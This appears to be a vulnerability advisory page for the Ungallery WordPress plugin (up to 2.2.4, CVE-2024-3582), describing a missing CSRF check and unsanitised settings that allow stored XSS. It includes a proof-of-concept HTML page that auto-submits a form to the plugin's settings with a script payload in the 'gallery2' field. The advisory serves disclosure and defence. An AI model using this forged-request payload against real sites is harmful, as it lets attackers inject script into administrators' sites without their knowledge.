Lucene search
Bob MatyasWPEX-ID:5A348B5D-13AA-40C3-9D21-0554683F8019HistoryApr 18, 2024 - 12:00 a.m.
Ungallery <= 2.2.4 - Stored XSS via CSRF
2024-04-1800:00:00
Bob Matyas
51
ungallery
stored xss
csrf
update
exploit
may 02 2024
Description The plugin does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack
Make a logged in admin open an HTML file containing the following:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/options-general.php?page=ungallerysettings" method="POST">
<input type="hidden" name="mt_submit_hidden" value="Y">
<input type="hidden" name="images_path" value="/var/www/html/wp-content/uploads/2024/01/*">
<input type="hidden" name="URI" value="<? print get_bloginfo('url'); ?>/" >
<input type="hidden" name="gallery" value="ungallery">
<input type="hidden" name="version" value="2.2.4">
<input type="hidden" name="gallery2" value='"><script>alert(2)</script>'>
<input type="hidden" name="cache_dir" value="/var/www/html/wp-content/cache/">
<button type="submit">Save Changes</button>
</form>
</body>
```Related
vulnrichment
vulnrichment
CVE-2024-3582 Ungallery <= 2.2.4 - Stored XSS via CSRF
2024-05-09 06:00:02
nvd
nvd
CVE-2024-3582
2024-05-14 15:41:54
cve
cve
CVE-2024-3582
2024-05-14 15:41:54
wpvulndb
wpvulndb
Ungallery <= 2.2.4 - Stored XSS via CSRF
2024-04-18 00:00:00
cvelist
cvelist
CVE-2024-3582 Ungallery <= 2.2.4 - Stored XSS via CSRF
2024-05-09 06:00:02
wordfence
wordfence
AI Score
5.9
Confidence
High
EPSS
0
Percentile
9.0%
Related for WPEX-ID:5A348B5D-13AA-40C3-9D21-0554683F8019